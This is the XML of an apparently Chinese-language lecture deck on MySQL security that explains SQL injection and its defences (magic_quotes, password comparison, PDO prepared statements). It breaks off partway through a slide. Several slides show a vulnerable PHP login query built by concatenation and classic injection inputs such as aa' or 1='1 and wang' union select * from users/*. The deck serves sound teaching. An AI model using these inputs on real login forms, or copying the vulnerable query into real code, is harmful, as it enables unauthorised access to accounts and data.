          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="MH_Entry_2">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId7"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4089894" y="3702465"/>
            <a:ext cx="4688528" cy="445522"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="72000" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>数据库安全</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="37" name="MH_Others_4"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3890132" y="3769796"/>
            <a:ext cx="185248" cy="328778"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FFBBAB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="MH_Number_2">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3413578" y="3666937"/>
            <a:ext cx="534424" cy="541829"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1"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sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF3B0D"/>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4" name="MH_Others_5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5322106" y="759729"/>
            <a:ext cx="1547788" cy="667006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FF3B0D"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>目 录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="MH_Others_6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4249284" y="1348887"/>
            <a:ext cx="3693432" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" spc="400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DDDDDD"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>CONTENTS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" spc="400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据安全之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在进行网站开发的时候，程序员由于对用户输人数据缺乏全面判断或者过滤不严导致服务器执行一些恶意信息，比如用户信息查询等。黑客可以根据恶意程序返回的结果获取相应的信息。这就是所谓的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>案例：常见的网站用户登录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="QQ截图20161209164811.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7486785" y="3681410"/>
            <a:ext cx="4428989" cy="2073572"/>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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>万能密码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>正常写法</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> $sql= "select * from users where user='$user' and pwd='$pwd'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> select * from users where user='zhai' and pwd='aa' or 1='1';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 万能密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aa' or 1='1</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>万能用户名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>select * from users where user='wang' union select * from users/* and pwd='123456';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 万能用户名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> wang' union select * from users/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>* 表示后面的语句不再执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pP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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数值注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>语句</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> $sql= "select * from users where user=$user and pwd=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>万能密码</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>33 union select * from users;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>万能用户名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>33 union select * from users/*</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入防范之服务器配置</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= "select * from users where user='$user' and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>'";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的万能密码和万能用户名就失效了</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>magic_quotes_gpc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=on</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>时，服务器会对所有的单引号进行转义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>但是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>= "select * from users where user=$user and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>=$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入方式仍可奏效</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pP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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入防范之密码比对</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>首先通过用户输入的用户名去查询数据库，如果查询到这个用户对应的密码，则和用户提交过来的密码进行比对，如果相同则说明该用户合法，反之则说明该用户非法。</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5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入防范之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>pdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>预处理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>php.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>中开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>pdo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，去掉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>extension=</a:t>
            </a:r>
            <a:r>
